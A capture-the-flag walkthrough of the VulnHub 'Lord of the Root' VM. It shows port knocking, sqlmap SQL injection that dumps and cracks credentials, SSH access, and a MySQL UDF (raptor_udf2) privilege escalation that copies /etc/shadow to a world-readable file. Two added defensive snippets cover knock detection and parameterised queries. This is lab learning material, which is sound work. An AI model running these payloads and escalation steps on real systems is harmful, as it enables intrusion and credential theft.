VulnHub: Lord of the Root Solution
Greetingz! This is a quick and dirty solution for the Lord of the Root boot-to-root VM challenge. Enjoy! -1N3
DOWNLOAD
https://www.vulnhub.com/entry/lord-of-the-root-101,129/
DISCOVERY
# netdiscover -r 192.168.1.0/24

 Currently scanning: Finished!   |   Screen View: Unique Hosts

 5 Captured ARP Req/Rep packets, from 5 hosts.   Total size: 282
 _____________________________________________________________________________
   IP            At MAC Address     Count     Len  MAC Vendor
 -----------------------------------------------------------------------------
 192.168.1.101   00:0c:29:8c:bd:7b     01     042  VMware, Inc.
ENUMERATION
[sn1per ASCII-art banner]
+ -- --=[http://xerosecurity.com
+ -- --=[sn1per v1.6 by 1N3

################################### Running recon #################################
Server:		206.248.154.22
Address:	206.248.154.22#53

** server can't find 101.1.168.192.in-addr.arpa: NXDOMAIN
Host 101.1.168.192.in-addr.arpa. not found: 3(NXDOMAIN)

################################### Pinging host ###################################
PING 192.168.1.101 (192.168.1.101) 56(84) bytes of data.

--- 192.168.1.101 ping statistics ---
1 packets transmitted, 0 received, 100% packet loss, time 0ms

################################### Running port scan ##############################
Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-15 16:00 EST
Nmap scan report for 192.168.1.101
Host is up (0.00026s latency).
Not shown: 65534 filtered ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
|   2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
|_  256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
MAC Address: 00:0C:29:8C:BD:7B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 3.19, Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.25 ms 192.168.1.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 90.69 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-15 16:02 EST
Nmap scan report for 192.168.1.101
Host is up (0.00025s latency).
PORT     STATE         SERVICE      VERSION
53/udp   open|filtered domain
67/udp   open|filtered dhcps
68/udp   open|filtered dhcpc
88/udp   open|filtered kerberos-sec
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
139/udp  open|filtered netbios-ssn
161/udp  open|filtered snmp
| snmp-hh3c-logins:
|_  baseoid: 1.3.6.1.4.1.25506.2.12.1.1.1
162/udp  open|filtered snmptrap
389/udp  open|filtered ldap
520/udp  open|filtered route
2049/udp open|filtered nfs
MAC Address: 00:0C:29:8C:BD:7B (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.25 ms 192.168.1.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 124.99 seconds
SSH BANNER
Since the only open port was SSH, I connected to it to see what options or hints the service itself gave away…
# ssh 192.168.1.101

[ASCII-art banner]

Easy as 1,2,3
PORT KNOCKING
As the SSH banner hints, we need to use port knocking to unlock whatever other hidden services are running on the target.
# knock 192.168.1.101 1 2 3
# sniper 192.168.1.101

[sn1per ASCII-art banner]
+ -- --=[http://xerosecurity.com
+ -- --=[sn1per v1.6 by 1N3

################################### Running recon #################################
Server:		206.248.154.22
Address:	206.248.154.22#53

** server can't find 101.1.168.192.in-addr.arpa: NXDOMAIN
Host 101.1.168.192.in-addr.arpa. not found: 3(NXDOMAIN)

################################### Pinging host ###################################
PING 192.168.1.101 (192.168.1.101) 56(84) bytes of data.

--- 192.168.1.101 ping statistics ---
1 packets transmitted, 0 received, 100% packet loss, time 0ms

################################### Running port scan ##############################
Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-15 16:16 EST
Nmap scan report for 192.168.1.101
Host is up (0.00022s latency).
Not shown: 65533 filtered ports
PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 6.6.1p1 Ubuntu 2ubuntu2.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
|   1024 3c:3d:e3:8e:35:f9:da:74:20:ef:aa:49:4a:1d:ed:dd (DSA)
|   2048 85:94:6c:87:c9:a8:35:0f:2c:db:bb:c1:3f:2a:50:c1 (RSA)
|_  256 f3:cd:aa:1d:05:f2:1e:8c:61:87:25:b6:f4:34:45:37 (ECDSA)
1337/tcp open  http    Apache httpd 2.4.7 ((Ubuntu))
|_http-server-header: Apache/2.4.7 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
MAC Address: 00:0C:29:8C:BD:7B (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running: Linux 3.X|4.X
OS CPE: cpe:/o:linux:linux_kernel:3 cpe:/o:linux:linux_kernel:4
OS details: Linux 3.10 - 3.19, Linux 3.2 - 4.0
Network Distance: 1 hop
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

TRACEROUTE
HOP RTT     ADDRESS
1   0.22 ms 192.168.1.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 101.71 seconds

Starting Nmap 7.01 ( https://nmap.org ) at 2016-01-15 16:18 EST
Nmap scan report for 192.168.1.101
Host is up (0.00020s latency).
PORT     STATE         SERVICE      VERSION
53/udp   open|filtered domain
67/udp   open|filtered dhcps
68/udp   open|filtered dhcpc
88/udp   open|filtered kerberos-sec
137/udp  open|filtered netbios-ns
138/udp  open|filtered netbios-dgm
139/udp  open|filtered netbios-ssn
161/udp  open|filtered snmp
| snmp-hh3c-logins:
|_  baseoid: 1.3.6.1.4.1.25506.2.12.1.1.1
162/udp  open|filtered snmptrap
389/udp  open|filtered ldap
520/udp  open|filtered route
2049/udp open|filtered nfs
MAC Address: 00:0C:29:8C:BD:7B (VMware)
Too many fingerprints match this host to give specific OS details
Network Distance: 1 hop

TRACEROUTE
HOP RTT     ADDRESS
1   0.20 ms 192.168.1.101

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 122.93 seconds
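From the defender's side, the same knock sequence is visible in the firewall log, which is also where a failed or out-of-order sequence shows up. The following is an added example, not part of the original write-up and not knockd's own code: it replays iptables-style LOG lines (constructed here, with a made-up `lotr` hostname and sample source addresses) and reports which sources completed the 1,2,3 sequence inside the knock window and which only probed the knock ports. The log line format and the 10-second window are assumptions.

```python
import re
from datetime import datetime, timedelta

# Constructed iptables LOG lines (not from the original post): SYNs to the
# knock ports 1, 2, 3 and, after a good sequence, to the unlocked port 1337.
SAMPLE_LOG = """\
Jan 15 16:15:01 lotr kernel: IN=eth0 OUT= SRC=192.168.1.100 DST=192.168.1.101 PROTO=TCP SPT=40001 DPT=1 SYN
Jan 15 16:15:01 lotr kernel: IN=eth0 OUT= SRC=192.168.1.100 DST=192.168.1.101 PROTO=TCP SPT=40002 DPT=2 SYN
Jan 15 16:15:02 lotr kernel: IN=eth0 OUT= SRC=192.168.1.100 DST=192.168.1.101 PROTO=TCP SPT=40003 DPT=3 SYN
Jan 15 16:15:09 lotr kernel: IN=eth0 OUT= SRC=192.168.1.100 DST=192.168.1.101 PROTO=TCP SPT=40004 DPT=1337 SYN
Jan 15 16:20:00 lotr kernel: IN=eth0 OUT= SRC=192.168.1.200 DST=192.168.1.101 PROTO=TCP SPT=50001 DPT=3 SYN
Jan 15 16:20:00 lotr kernel: IN=eth0 OUT= SRC=192.168.1.200 DST=192.168.1.101 PROTO=TCP SPT=50002 DPT=2 SYN
Jan 15 16:20:01 lotr kernel: IN=eth0 OUT= SRC=192.168.1.200 DST=192.168.1.101 PROTO=TCP SPT=50003 DPT=1 SYN
Jan 15 16:30:00 lotr kernel: IN=eth0 OUT= SRC=192.168.1.250 DST=192.168.1.101 PROTO=TCP SPT=60001 DPT=1 SYN
Jan 15 16:31:00 lotr kernel: IN=eth0 OUT= SRC=192.168.1.250 DST=192.168.1.101 PROTO=TCP SPT=60002 DPT=2 SYN
Jan 15 16:32:00 lotr kernel: IN=eth0 OUT= SRC=192.168.1.250 DST=192.168.1.101 PROTO=TCP SPT=60003 DPT=3 SYN
"""

LOG_RE = re.compile(
    r"^(?P<ts>\w{3} +\d+ \d\d:\d\d:\d\d) .*?\bSRC=(?P<src>\S+) .*?\bDPT=(?P<dpt>\d+)"
)


def parse_line(line):
    """Return (timestamp, source IP, destination port) or None for unrelated lines."""
    m = LOG_RE.match(line)
    if not m:
        return None
    ts = datetime.strptime(m.group("ts"), "%b %d %H:%M:%S")
    return ts, m.group("src"), int(m.group("dpt"))


def find_knocks(log_text, sequence=(1, 2, 3), window_seconds=10):
    """Replay the log and track, per source, how far through the knock
    sequence it has got. Returns (completed, incomplete): completed is a list
    of (source, time) for every full in-order sequence inside the window;
    incomplete is the sorted list of sources that hit knock ports but never
    completed the sequence (wrong order, or too slow)."""
    window = timedelta(seconds=window_seconds)
    state = {}          # source -> (index of next expected knock, time of first knock)
    completed = []
    touched = set()
    for line in log_text.splitlines():
        rec = parse_line(line)
        if rec is None:
            continue
        ts, src, dpt = rec
        if dpt not in sequence:
            continue  # traffic to other ports does not affect the knock state
        touched.add(src)
        idx, start = state.get(src, (0, None))
        if idx > 0 and ts - start > window:
            idx, start = 0, None       # too slow: start over
        if dpt == sequence[idx]:
            if idx == 0:
                start = ts
            idx += 1
        elif dpt == sequence[0]:
            idx, start = 1, ts         # a fresh first knock restarts the sequence
        else:
            idx, start = 0, None       # out-of-order knock resets it
        if idx == len(sequence):
            completed.append((src, ts.strftime("%b %d %H:%M:%S")))
            idx, start = 0, None
        state[src] = (idx, start)
    incomplete = sorted(touched - {src for src, _ in completed})
    return completed, incomplete


if __name__ == "__main__":
    done, partial = find_knocks(SAMPLE_LOG)
    for src, when in done:
        print(f"knock sequence completed by {src} at {when}")
    for src in partial:
        print(f"knock ports probed without a valid sequence by {src}")
```

On the sample data only 192.168.1.100 completes the sequence; 192.168.1.200 knocks in the wrong order and 192.168.1.250 takes a minute between knocks, so both are reported as probes. A completed sequence followed by a connection to the unlocked port is the pair of events worth alerting on.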
INTERESTING RESPONSE
Now that we have an Apache server listening on 1337/tcp, I quickly discovered an interesting response in its 404 pages.
HTTP/1.1 404 Not Found
Date: Sat, 16 Jan 2016 00:01:17 GMT
Server: Apache/2.4.7 (Ubuntu)
Last-Modified: Fri, 18 Sep 2015 03:47:34 GMT
ETag: "74-51ffd64576fc7"
Accept-Ranges: bytes
Content-Length: 116
Connection: close
Content-Type: text/html

<html>
<img src="/images/hipster.jpg" align="middle">
<!--THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh-->
</html>
DECODED MESSAGE
It seemed strange to have an encoded message in the HTML comments of the 404 page, so I knew this was a hint that could likely be decoded. Sure enough, it turned out to be a double-encoded base64 string.
THprM09ETTBOVEl4TUM5cGJtUmxlQzV3YUhBPSBDbG9zZXIh = Lzk3ODM0NTIxMC9pbmRleC5waHA= Closer!
Lzk3ODM0NTIxMC9pbmRleC5waHA= = /978345210/index.php
LOGIN PAGE
Now that the decoded message has revealed a hidden login page, the next obvious step was to try some form of SQL injection, authentication bypass, or brute force to get further…
POST /978345210/index.php HTTP/1.1
Host: 192.168.1.101:1337
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:18.0) Gecko/20100101 Firefox/18.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.1.101:1337/978345210/index.php
Cookie: PHPSESSID=u3gjjtco6dqnq2c5peo530hbj3; BEEFHOOK=Ltt1x7RzZyuW6VnfdQu8dTM0zmXPpxe8Fgk6KjqhgU9KZzL4DptDN2KiVOyNsPTeiryahKYGwjIYTbbX
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 42

username=user&password=pass&submit=+Login+

HTTP/1.1 200 OK
Date: Fri, 15 Jan 2016 23:37:34 GMT
Server: Apache/2.4.7 (Ubuntu)
X-Powered-By: PHP/5.5.9-1ubuntu4.11
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 516
Connection: close
Content-Type: text/html

<!DOCTYPE html>
<html>
<head>
<title>LOTR Login!</title>
</head>
<body>
<div id="main">
<h1>Welcome to the Gates of Mordor</h1>
<div id="login">
<form action="" method="post">
<label>User :</label>
<input id="name" name="username" placeholder="username" type="text"><br>
<label>Password :</label>
<input id="password" name="password" placeholder="**********" type="password">
<br>
<input name="submit" type="submit" value=" Login ">
<span>Username or Password is invalid</span>
</form>
</div>
</div>
</body>
</html>
SQL INJECTION VULNERABILITY
Scanning with Burp Suite quickly revealed that the login form was vulnerable to SQL injection.
SQL INJECTION EXPLOITATION
Using SQLMap, we can dig into the DB and see what else we can find.
# sqlmap -u 'http://192.168.1.101:1337/978345210/index.php' --data='username=user&password=pass&submit=+Login+' --cookie='PHPSESSID=u3gjjtco6dqnq2c5peo530hbj3; BEEFHOOK=Ltt1x7RzZyuW6VnfdQu8dTM0zmXPpxe8Fgk6KjqhgU9KZzL4DptDN2KiVOyNsPTeiryahKYGwjIYTbbX' --level=5 --risk=3

[sqlmap ASCII-art banner] {1.0-dev-nongit-201601080a89}
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 19:09:48

[19:09:48] [INFO] testing connection to the target URL
[19:09:48] [INFO] heuristics detected web page charset 'ascii'
[19:09:48] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[19:09:48] [INFO] testing if the target URL is stable
[19:09:49] [INFO] target URL is stable
[19:09:49] [INFO] testing if POST parameter 'username' is dynamic
[19:09:49] [WARNING] POST parameter 'username' does not appear dynamic
[19:09:49] [WARNING] heuristic (basic) test shows that POST parameter 'username' might not be injectable
[19:09:49] [INFO] testing for SQL injection on POST parameter 'username'
[19:10:21] [INFO] testing 'MySQL >= 5.0.12 AND time-based blind (SELECT)'
[19:10:31] [INFO] POST parameter 'username' seems to be 'MySQL >= 5.0.12 AND time-based blind (SELECT)' injectable
it looks like the back-end DBMS is 'MySQL'. Do you want to skip test payloads specific for other DBMSes? [Y/n] y
[19:10:35] [INFO] testing 'Generic UNION query (NULL) - 1 to 20 columns'
[19:10:35] [INFO] automatically extending ranges for UNION query injection technique tests as there is at least one other (potential) technique found
sqlmap got a 302 redirect to 'http://192.168.1.101:1337/978345210/profile.php'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [y/N] y
[19:10:43] [INFO] target URL appears to be UNION injectable with 1 columns
[19:10:43] [WARNING] if UNION based SQL injection is not detected, please consider and/or try to force the back-end DBMS (e.g. '--dbms=mysql')
[19:10:43] [INFO] testing 'Generic UNION query (random number) - 1 to 20 columns'
[19:10:44] [INFO] testing 'Generic UNION query (NULL) - 22 to 40 columns'
[19:10:45] [INFO] testing 'Generic UNION query (random number) - 22 to 40 columns'
[19:10:46] [INFO] testing 'Generic UNION query (NULL) - 42 to 60 columns'
[19:10:47] [INFO] testing 'Generic UNION query (random number) - 42 to 60 columns'
[19:10:48] [INFO] testing 'Generic UNION query (NULL) - 62 to 80 columns'
[19:10:49] [INFO] testing 'Generic UNION query (random number) - 62 to 80 columns'
[19:10:50] [INFO] testing 'Generic UNION query (NULL) - 82 to 100 columns'
[19:10:52] [INFO] testing 'Generic UNION query (random number) - 82 to 100 columns'
[19:10:53] [INFO] checking if the injection point on POST parameter 'username' is a false positive
POST parameter 'username' is vulnerable. Do you want to keep testing the others (if any)? [y/N] n
sqlmap identified the following injection point(s) with a total of 5852 HTTP(s) requests:
---
Parameter: username (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: username=user' AND (SELECT * FROM (SELECT(SLEEP(5)))wUmu) AND 'mbXF'='mbXF&password=pass&submit= Login
---
[19:13:04] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS: MySQL 5.0.12
[19:13:04] [INFO] fetched data logged to text files under '/root/.sqlmap/output/192.168.1.101'

[*] shutting down at 19:13:04

# sqlmap -u 'http://192.168.1.101:1337/978345210/index.php' --data='username=user&password=pass&submit=+Login+' --cookie='PHPSESSID=u3gjjtco6dqnq2c5peo530hbj3; BEEFHOOK=Ltt1x7RzZyuW6VnfdQu8dTM0zmXPpxe8Fgk6KjqhgU9KZzL4DptDN2KiVOyNsPTeiryahKYGwjIYTbbX' --level=5 --risk=3 --all

[sqlmap ASCII-art banner] {1.0-dev-nongit-201601080a89}
http://sqlmap.org

[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent is illegal. It is the end user's responsibility to obey all applicable local, state and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program

[*] starting at 19:14:15

[19:14:16] [INFO] resuming back-end DBMS 'mysql'
[19:14:16] [INFO] testing connection to the target URL
[19:14:16] [INFO] heuristics detected web page charset 'ascii'
sqlmap got a 302 redirect to 'http://192.168.1.101:1337/978345210/profile.php'. Do you want to follow? [Y/n] y
redirect is a result of a POST request. Do you want to resend original POST data to a new location? [Y/n] y
[19:14:18] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: username (POST)
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: username=user' AND (SELECT * FROM (SELECT(SLEEP(5)))wUmu) AND 'mbXF'='mbXF&password=pass&submit= Login
---
[19:14:18] [INFO] the back-end DBMS is MySQL
[19:14:18] [INFO] fetching banner
[19:14:18] [WARNING] time-based comparison requires larger statistical model, please wait..............................
[19:14:19] [WARNING] it is very important not to stress the network adapter during usage of time-based payloads to prevent potential errors
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n] y
[19:14:39] [INFO] adjusting time delay to 1 second due to good response times
5.5.44-0ubuntu0.14.04.1
web server operating system: Linux Ubuntu
web application technology: Apache 2.4.7, PHP 5.5.9
back-end DBMS operating system: Linux Ubuntu
back-end DBMS: MySQL 5.0.12
banner: '5.5.44-0ubuntu0.14.04.1'
[19:16:13] [INFO] fetching current user
[19:16:13] [INFO] retrieved: root@localhost
current user: 'root@localhost'
[19:17:23] [INFO] fetching current database
[19:17:23] [INFO] retrieved: Webapp
current database: 'Webapp'
[19:17:50] [INFO] fetching server hostname
[19:17:50] [INFO] retrieved: LordOfTheRoot
hostname: 'LordOfTheRoot'
[19:18:50] [INFO] testing if current user is DBA
[19:18:50] [INFO] fetching current user
current user is DBA: True
[19:18:51] [INFO] fetching database users
[19:18:51] [INFO] fetching number of database users
[19:18:51] [INFO] retrieved: 5
[19:18:53] [INFO] retrieved: 'root'@'localhost'
[19:20:16] [INFO] retrieved: 'root'@'lordoftheroot'
[19:22:01] [INFO] retrieved: 'root'@'127.0.0.1'
[19:23:18] [INFO] retrieved: 'root'@'::1'
[19:24:10] [INFO] retrieved: 'debian-sys-maint'@'localhost'
database management system users [5]:
[*] 'debian-sys-maint'@'localhost'
[*] 'root'@'127.0.0.1'
[*] 'root'@'::1'
[*] 'root'@'localhost'
[*] 'root'@'lordoftheroot'

[19:26:15] [INFO] fetching database users password hashes
[19:26:15] [INFO] fetching database users
[19:26:15] [INFO] fetching number of password hashes for user 'root'
[19:26:15] [INFO] retrieved: 1
[19:26:17] [INFO] fetching password hashes for user 'root'
[19:26:17] [INFO] retrieved: *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F
[19:28:32] [INFO] fetching number of password hashes for user 'debian-sys-maint'
[19:28:32] [INFO] retrieved: 1
[19:28:33] [INFO] fetching password hashes for user 'debian-sys-maint'
[19:28:33] [INFO] retrieved: *A55A9B9049F69BC2768C9284615361DFBD580B34
do you want to store hashes to a temporary file for eventual further processing with other tools [y/N] y
[19:31:27] [INFO] writing hashes to a temporary file '/tmp/sqlmapmR6GTw22036/sqlmaphashes-GwopYC.txt'
do you want to perform a dictionary-based attack against retrieved password hashes? [Y/n/q] y
[19:31:32] [INFO] using hash method 'mysql_passwd'
what dictionary do you want to use?
[1] default dictionary file '/usr/share/sqlmap/txt/wordlist.zip' (press Enter)
[2] custom dictionary file
[3] file with list of dictionary files
> 1
[19:31:34] [INFO] using default dictionary
do you want to use common password suffixes? (slow!) [y/N] y
[19:31:38] [INFO] starting dictionary-based cracking (mysql_passwd)
[19:31:38] [INFO] starting 8 processes
[19:31:40] [INFO] cracked password 'darkshadow' for user 'root'
database management system users password hashes:
[*] debian-sys-maint [1]:
    password hash: *A55A9B9049F69BC2768C9284615361DFBD580B34
[*] root [1]:
    password hash: *4DD56158ACDBA81BFE3FF9D3D7375231596CE10F
    clear-text password: darkshadow

[19:35:14] [INFO] fetching database users privileges
[19:35:14] [INFO] fetching database users
[21:13:23] [INFO] fetching columns for table 'Users' in database 'Webapp'
[21:13:23] [INFO] retrieved: 3
[21:13:27] [INFO] retrieved: id
[21:13:37] [INFO] retrieved: username
[21:14:14] [INFO] retrieved: password
[21:14:56] [INFO] fetching entries for table 'Users' in database 'Webapp'
[21:14:56] [INFO] fetching number of entries for table 'Users' in database 'Webapp'
[21:14:56] [INFO] retrieved: 5
[21:14:59] [INFO] retrieved: 1
[21:15:03] [INFO] retrieved: iwilltakethering
[21:16:23] [INFO] retrieved: frodo
[21:16:51] [INFO] retrieved: 2
[21:16:55] [INFO] retrieved: MyPreciousR00t
[21:18:05] [INFO] retrieved: smeagol
[21:18:39] [INFO] retrieved: 3
[21:18:44] [INFO] retrieved: AndMySword
[21:19:32] [INFO] retrieved: aragorn
[21:20:05] [INFO] retrieved: 4
[21:20:10] [INFO] retrieved: AndMyBow
[21:20:45] [INFO] retrieved: legolas
[21:21:20] [INFO] retrieved: 5
[21:21:24] [INFO] retrieved: AndMyAxe
[21:21:57] [INFO] retrieved: gimli
[21:22:20] [INFO] analyzing table dump for possible password hashes
Database: Webapp
Table: Users
[5 entries]
+----+----------+------------------+
| id | username | password         |
+----+----------+------------------+
| 1  | frodo    | iwilltakethering |
| 2  | smeagol  | MyPreciousR00t   |
| 3  | aragorn  | AndMySword       |
| 4  | legolas  | AndMyBow         |
| 5  | gimli    | AndMyAxe         |
+----+----------+------------------+

[21:22:20] [INFO] table 'Webapp.Users' dumped to CSV file '/root/.sqlmap/output/192.168.1.101/dump/Webapp/Users.csv'
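The bug behind all of the above is the login query being built from the raw form fields. The following is an added example, not the VM's PHP and not code from the original write-up: it rebuilds a Users table in an in-memory SQLite database (sample rows and passwords, constructed here; SQLite stands in for MySQL so it runs offline) and puts the string-concatenated login next to the parameterised one. The exact query shape of the real application is an assumption; only the fact that it was injectable is on the page.

```python
import sqlite3


def make_db():
    """Constructed in-memory stand-in for the Webapp.Users table (sample rows,
    not the VM's real data)."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (id INTEGER PRIMARY KEY, username TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO Users (username, password) VALUES (?, ?)",
        [("frodo", "sample-pass-1"), ("smeagol", "sample-pass-2")],
    )
    return conn


def vulnerable_login(conn, username, password):
    """The injectable pattern: user input spliced straight into the SQL text.
    Returns True/False for accepted/rejected, or None when the input produced
    a SQL error (the single-quote 'heuristic' signal scanners look for)."""
    query = "SELECT id FROM Users WHERE username='%s' AND password='%s'" % (username, password)
    try:
        return conn.execute(query).fetchone() is not None
    except sqlite3.Error:
        return None


def safe_login(conn, username, password):
    """Parameterised form: the driver passes the values separately from the
    statement, so a quote, a comment marker or a SLEEP() in the input is just
    part of a string literal and never changes the query's logic."""
    query = "SELECT id FROM Users WHERE username=? AND password=?"
    return conn.execute(query, (username, password)).fetchone() is not None


if __name__ == "__main__":
    db = make_db()
    probes = [("frodo", "sample-pass-1"), ("' OR 1=1 --", "anything"), ("O'Brien", "x")]
    for user, pw in probes:
        print(f"{user!r:16} vulnerable={vulnerable_login(db, user, pw)!s:5} safe={safe_login(db, user, pw)}")
```

The third probe is the telling one: a legitimate name with an apostrophe makes the concatenated query fail outright, which is the same signal sqlmap used to decide the parameter was injectable, while the parameterised query simply reports no such user. Storing the passwords in clear text, as the dump above shows, turns a single injectable parameter into a full credential leak.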
SSH LOGIN
Now that we have lots of credentials and clear-text passwords, the next obvious route was to re-try logging in with the accounts over SSH…
# ssh smeagol@192.168.1.101

[ASCII-art banner]

Easy as 1,2,3
smeagol@192.168.1.101's password:
Welcome to Ubuntu 14.04.3 LTS (GNU/Linux 3.19.0-25-generic i686)

 * Documentation:  https://help.ubuntu.com/

[ASCII-art banner]

Last login: Tue Sep 22 12:59:38 2015 from 192.168.55.135
smeagol@LordOfTheRoot:~$ ls
Desktop  Documents  Downloads  examples.desktop  Music  Pictures  Public  Templates  Videos
smeagol@LordOfTheRoot:~$ uname -a
Linux LordOfTheRoot 3.19.0-25-generic #26~14.04.1-Ubuntu SMP Fri Jul 24 21:18:00 UTC 2015 i686 i686 i686 GNU/Linux
smeagol@LordOfTheRoot:~$ sudo su
[sudo] password for smeagol:
smeagol is not in the sudoers file.  This incident will be reported.
smeagol@LordOfTheRoot:~$ cat /etc/passwd
root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/usr/sbin/nologin
bin:x:2:2:bin:/bin:/usr/sbin/nologin
sys:x:3:3:sys:/dev:/usr/sbin/nologin
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/usr/sbin/nologin
man:x:6:12:man:/var/cache/man:/usr/sbin/nologin
lp:x:7:7:lp:/var/spool/lpd:/usr/sbin/nologin
mail:x:8:8:mail:/var/mail:/usr/sbin/nologin
news:x:9:9:news:/var/spool/news:/usr/sbin/nologin
uucp:x:10:10:uucp:/var/spool/uucp:/usr/sbin/nologin
proxy:x:13:13:proxy:/bin:/usr/sbin/nologin
www-data:x:33:33:www-data:/var/www:/usr/sbin/nologin
backup:x:34:34:backup:/var/backups:/usr/sbin/nologin
list:x:38:38:Mailing List Manager:/var/list:/usr/sbin/nologin
irc:x:39:39:ircd:/var/run/ircd:/usr/sbin/nologin
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/usr/sbin/nologin
nobody:x:65534:65534:nobody:/nonexistent:/usr/sbin/nologin
libuuid:x:100:101::/var/lib/libuuid:
syslog:x:101:104::/home/syslog:/bin/false
messagebus:x:102:106::/var/run/dbus:/bin/false
usbmux:x:103:46:usbmux daemon,,,:/home/usbmux:/bin/false
dnsmasq:x:104:65534:dnsmasq,,,:/var/lib/misc:/bin/false
avahi-autoipd:x:105:113:Avahi autoip daemon,,,:/var/lib/avahi-autoipd:/bin/false
kernoops:x:106:65534:Kernel Oops Tracking Daemon,,,:/:/bin/false
rtkit:x:107:114:RealtimeKit,,,:/proc:/bin/false
saned:x:108:115::/home/saned:/bin/false
whoopsie:x:109:116::/nonexistent:/bin/false
speech-dispatcher:x:110:29:Speech Dispatcher,,,:/var/run/speech-dispatcher:/bin/sh
avahi:x:111:117:Avahi mDNS daemon,,,:/var/run/avahi-daemon:/bin/false
lightdm:x:112:118:Light Display Manager:/var/lib/lightdm:/bin/false
colord:x:113:121:colord colour management daemon,,,:/var/lib/colord:/bin/false
hplip:x:114:7:HPLIP system user,,,:/var/run/hplip:/bin/false
pulse:x:115:122:PulseAudio daemon,,,:/var/run/pulse:/bin/false
smeagol:x:1000:1000:smeagol,,,:/home/smeagol:/bin/bash
mysql:x:116:125:MySQL Server,,,:/nonexistent:/bin/false
sshd:x:117:65534::/var/run/sshd:/usr/sbin/nologin
smeagol@LordOfTheRoot:~$
MYSQL USER DEFINED FUNCTIONS PRIVILEGE ESCALATION
Now that we have a full SSH shell on the target, the next route to root is privilege escalation. Since I had the MySQL root password recovered from the database hashes and a full SSH shell, I decided the quickest way would be the MySQL user-defined function (UDF) exploit, raptor_udf2, which registers a shared library as a SQL function that runs shell commands with the privileges of the MySQL daemon.
gcc -g -c raptor_udf2.c
gcc -g -shared -Wl,-soname,raptor_udf2.so -o raptor_udf2.so raptor_udf2.o -lc
mysql -u root -p
use mysql;
create table foo(line blob);
insert into foo values(load_file('/tmp/raptor_udf2.so'));
select * from foo into dumpfile '/usr/lib/mysql/plugin/raptor_udf2.so';
create function do_system returns integer soname 'raptor_udf2.so';
select * from mysql.func;

mysql> SELECT do_system('cat /etc/shadow');
+------------------------------+
| do_system('cat /etc/shadow') |
+------------------------------+
|                            0 |
+------------------------------+
1 row in set (0.01 sec)

mysql> select do_system('cat /etc/shadow > /tmp/shadow');
+--------------------------------------------+
| do_system('cat /etc/shadow > /tmp/shadow') |
+--------------------------------------------+
|                                          0 |
+--------------------------------------------+
1 row in set (0.01 sec)

mysql> select do_system('chmod 777 /tmp/shadow');
+------------------------------------+
| do_system('chmod 777 /tmp/shadow') |
+------------------------------------+
|                                  0 |
+------------------------------------+
1 row in set (0.02 sec)

smeagol@LordOfTheRoot:/tmp$ cat shadow
